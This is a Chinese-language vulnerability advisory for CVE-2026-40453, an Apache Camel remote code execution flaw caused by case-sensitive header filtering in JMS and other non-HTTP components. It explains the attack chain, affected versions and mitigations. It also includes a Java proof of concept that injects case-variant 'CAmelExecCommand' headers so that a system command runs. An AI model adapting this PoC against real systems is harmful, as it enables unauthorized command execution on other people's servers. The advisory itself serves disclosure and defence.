CVE-2026-40453 CVSS 9.9 严重

CVE-2026-40453 Apache Camel 远程代码执行漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40453

漏洞类型

远程代码执行

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Apache Camel

漏洞概述

Apache Camel在修复CVE-2025-27636时，未对JMS等非HTTP组件的HeaderFilterStrategy应用大小写不敏感过滤。攻击者可利用此漏洞，通过注入大小写变体的内部头部（如CAmelExecCommandExecutable），绕过安全检查并导致下游组件执行任意代码或写入文件。

技术细节

该漏洞源于JMS、CoAP等五种非HTTP HeaderFilterStrategy未同步应用setLowerCase(true)修复。这些策略仅对特定大小写（如'Camel'）进行过滤，而Camel Exchange内部以不区分大小写的方式存储头部。攻击者若拥有JMS生产者权限，可发送包含畸形头部（如'CAmelExecCommandExecutable'）的消息。当消息流经Camel路由并到达camel-exec或camel-file等组件时，这些组件会解析该头部为标准指令，从而触发远程代码执行或文件写入。

攻击链分析

STEP 1

1. 攻击者获取访问权限

攻击者获得向目标Camel路由所使用的JMS代理发送消息的权限（低权限账户即可）。

STEP 2

2. 构造恶意消息

攻击者创建包含大小写变体Camel内部头部的消息，例如使用'CAmelExecCommandExecutable'代替'CamelExecCommandExecutable'。

STEP 3

3. 绕过过滤器

由于JMS HeaderFilterStrategy采用区分大小写的startsWith检查，畸形头部未被过滤掉。

STEP 4

4. 头部解析与利用

Camel Exchange接收消息并以大小写不敏感方式存储头部。下游组件（如camel-exec）解析该头部并执行攻击者指定的系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import javax.jms.*;
import org.apache.activemq.ActiveMQConnectionFactory;

public class CamelExploit {
    public static void main(String[] args) throws Exception {
        ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://localhost:61616");
        Connection connection = connectionFactory.createConnection();
        Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
        Destination destination = session.createQueue("TEST.QUEUE");
        MessageProducer producer = session.createProducer(destination);
        TextMessage message = session.createTextMessage("Malicious Payload");
        // Inject case-variant header to bypass filter
        message.setStringProperty("CAmelExecCommandExecutable", "/bin/touch");
        message.setStringProperty("CAmelExecCommandArgs", "/tmp/pwned");
        producer.send(message);
        connection.close();
    }
}

影响范围

Apache Camel 3.0.0 至 4.14.6 之前

Apache Camel 4.15.0 至 4.18.2 之前

Apache Camel 4.19.0 至 4.20.0 之前

防御指南

临时缓解措施

严格限制对JMS消息代理的访问，确保只有可信的生产者可以连接。在应用层面对所有入站消息头进行严格的大小写不敏感过滤，剔除包含'Camel'关键字的头部。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40453
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40453
3 Details https://www.cvedetails.com/cve/CVE-2026-40453/
4 VulDB https://vuldb.com/cve/CVE-2026-40453
5 Link https://camel.apache.org/security/CVE-2026-40453.html

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表